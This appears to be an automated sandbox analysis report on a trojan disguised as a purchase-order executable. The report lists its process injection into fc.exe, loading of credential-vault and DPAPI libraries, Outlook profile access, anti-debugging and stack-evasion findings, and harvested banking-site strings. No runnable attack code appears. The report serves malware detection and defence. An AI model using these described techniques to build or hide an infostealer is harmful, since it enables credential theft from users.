              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6FF096_2_02E6FF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6FCF26_2_02E6FCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E29C326_2_02E29C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DCFDC06_2_02DCFDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E67D736_2_02E67D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB3D406_2_02DB3D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E61D5A6_2_02E61D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_00351FD06_2_00351FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0034CE806_2_0034CE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0034B07F6_2_0034B07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0034D0A06_2_0034D0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0034B0806_2_0034B080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_003411E76_2_003411E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0034B1D06_2_0034B1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0034B1C46_2_0034B1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_003556806_2_00355680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0035387B6_2_0035387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_003538806_2_00353880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0036BCD06_2_0036BCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCE2F56_2_02BCE2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCE7B36_2_02BCE7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCE4136_2_02BCE413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCE57B6_2_02BCE57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCCB136_2_02BCCB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCD8786_2_02BCD878
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AABCA98_2_04AABCA9
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AABCB58_2_04AABCB5
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AA1CCC8_2_04AA1CCC
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04ACC7B58_2_04ACC7B5
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AB61658_2_04AB6165
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AAD9658_2_04AAD965
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AB2AB58_2_04AB2AB5
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AADB858_2_04AADB85
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AB43608_2_04AB4360
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AB43658_2_04AB4365
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AABB648_2_04AABB64
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AABB658_2_04AABB65
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02E1EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02DF7E54 appears 102 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02DE5130 appears 58 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02E2F290 appears 105 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D9B970 appears 280 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: String function: 01597E54 appears 103 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: String function: 0153B970 appears 280 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: String function: 01585130 appears 58 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: String function: 015CF290 appears 105 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: String function: 015BEA12 appears 86 times
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: No import functions for PE file found
              Source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2416012955.00000000012DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP0059842.exe
              Source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2418057297.0000000001493000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP0059842.exe
              Source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.00000000017E1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP0059842.exe
              Source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2513662763.00000000010D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs PO No. 0146850827805 HSP0059842.exe
              Source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2513662763.00000000010CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs PO No. 0146850827805 HSP0059842.exe
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@10/7
              Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user\AppData\Local\Temp\17O3k-2IJump to behavior
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fc.exe, 00000006.00000002.3981631338.00000000027AD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3981631338.00000000027A8000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3981631338.000000000279E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: PO No. 0146850827805 HSP0059842.exeReversingLabs: Detection: 65%
              Source: unknownProcess created: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exe "C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exe"
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2513662763.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000005.00000002.3982144949.00000000014F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2513662763.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000005.00000002.3982144949.00000000014F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xVHAYGlJzfAqXG.exe, 00000005.00000000.2436656229.00000000005EE000.00000002.00000001.01000000.00000005.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000000.2597123862.00000000005EE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2416012955.00000000011BC000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2418057297.0000000001366000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.00000000016AE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000006.00000003.2517217275.0000000002BC7000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3982768895.0000000002F0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000006.00000003.2514052267.0000000002A15000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3982768895.0000000002D70000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: PO No. 0146850827805 HSP0059842.exe, PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2416012955.00000000011BC000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2418057297.0000000001366000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.00000000016AE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000006.00000003.2517217275.0000000002BC7000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3982768895.0000000002F0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000006.00000003.2514052267.0000000002A15000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3982768895.0000000002D70000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B990BB pushad ; iretd 0_2_00B990E4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B93863 push ss; iretd 0_2_00B93880
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B83490 push eax; ret 0_2_00B83492
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B94DC4 pushfd ; retf 0_2_00B94DCE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015409AD push ecx; mov dword ptr [esp], ecx0_2_015409B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DA09AD push ecx; mov dword ptr [esp], ecx6_2_02DA09B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0035B011 push cs; retf 6_2_0035B01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_00351931 pushfd ; retf 6_2_0035193B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0035B98E push FFFFFFADh; ret 6_2_0035B990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0035BB69 push ecx; ret 6_2_0035BB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_00355C28 pushad ; iretd 6_2_00355C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0035DD8B push eax; iretd 6_2_0035DDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BD5202 push eax; ret 6_2_02BD5204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCB3C8 push edi; ret 6_2_02BCB445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCB3C4 push edi; ret 6_2_02BCB445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCC033 push ss; iretd 6_2_02BCC036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BC71EA push es; ret 6_2_02BC71EB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCBA5F push cs; retf 6_2_02BCBA67
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02BCAE60 push ds; retf 6_2_02BCAE61
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AB2416 pushfd ; retf 8_2_04AB2420
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04ABC473 push FFFFFFADh; ret 8_2_04ABC475
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04ABC64E push ecx; ret 8_2_04ABC64F
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AA77C9 pushad ; ret 8_2_04AA77CA
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AB670D pushad ; iretd 8_2_04AB6736
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04ABBAF6 push cs; retf 8_2_04ABBAFF
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 8_2_04AB5BE5 push 1537E110h; ret 8_2_04AB5BED
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: section name: .text entropy: 7.995243229085214
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0158096E rdtsc 0_2_0158096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.7 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 5268Thread sleep count: 41 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 5268Thread sleep time: -82000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe TID: 6288Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe TID: 6288Thread sleep time: -34500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0035C870 FindFirstFileW,FindNextFileW,FindClose,6_2_0035C870
              Source: 17O3k-2I.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: fc.exe, 00000006.00000002.3985329991.00000000078F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,116964
              Source: 17O3k-2I.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: 17O3k-2I.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: 17O3k-2I.6.drBinary or memory string: discord.comVMware20,11696487552f
              Source: 17O3k-2I.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: fc.exe, 00000006.00000002.3985329991.00000000078F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552mq<
              Source: 17O3k-2I.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: firefox.exe, 00000009.00000002.2820651999.0000018CAAFDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99*
              Source: 17O3k-2I.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: global block list test formVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: 17O3k-2I.6.drBinary or memory string: AMC password management pageVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: 17O3k-2I.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: 17O3k-2I.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: 17O3k-2I.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: fc.exe, 00000006.00000002.3985329991.00000000078F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,116C
              Source: fc.exe, 00000006.00000002.3985329991.00000000078F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552~
              Source: 17O3k-2I.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: 17O3k-2I.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: 17O3k-2I.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: xVHAYGlJzfAqXG.exe, 00000008.00000002.3982214118.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
              Source: 17O3k-2I.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: 17O3k-2I.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: 17O3k-2I.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: fc.exe, 00000006.00000002.3985329991.00000000078F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nteractive Brokers - EU East & CentralVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: fc.exe, 00000006.00000002.3981631338.00000000026E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm M*y
              Source: 17O3k-2I.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: 17O3k-2I.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: 17O3k-2I.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: 17O3k-2I.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: 17O3k-2I.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: fc.exe, 00000006.00000002.3985329991.00000000078F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,K
              Source: 17O3k-2I.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0158096E rdtsc 0_2_0158096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B97CA3 LdrLoadDll,0_2_00B97CA3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546154 mov eax, dword ptr fs:[00000030h]0_2_01546154
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546154 mov eax, dword ptr fs:[00000030h]0_2_01546154
